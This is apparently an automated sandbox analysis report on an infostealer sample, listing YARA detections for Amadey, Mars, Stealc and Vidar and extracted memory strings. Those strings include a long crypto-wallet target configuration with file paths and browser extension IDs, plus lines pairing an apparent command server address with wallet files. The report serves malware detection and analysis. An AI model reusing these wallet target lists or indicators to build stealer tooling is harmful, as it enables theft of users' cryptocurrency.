Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6CCA35A0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00BF6590 LookupAccountNameA, 11_2_00BF6590
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 12.2.explorti.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorti.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explorti.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.GHCGDAFCFH.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2549928644.0000000000BF1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1604254276.0000000000BF1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1514567281.0000000004E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1562659650.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1555525227.0000000000671000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1563761009.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2244379812.0000000000BF1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.2203667415.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.25bb638aac.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1502723173.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1635944793.0000000000E41000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1506072996.0000000001FC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1636866589.0000000001C3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Zachv5lCuu.exe PID: 7516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 25bb638aac.exe PID: 2184, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.25bb638aac.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1502723173.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1635944793.0000000000E41000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Zachv5lCuu.exe PID: 7516, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ntdesk\AppData\Roaming\\ElectronCash\wallets\\*.*
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ntdesk\AppData\Roaming\\Exodus\\exodus.conf.json
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ntdesk\AppData\Roaming\\Exodus\\exodus.conf.json
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81ntdesk\AppData\Roaming\\Exodus\\exodus.conf.json
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\Binance\.finger-print.fp
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
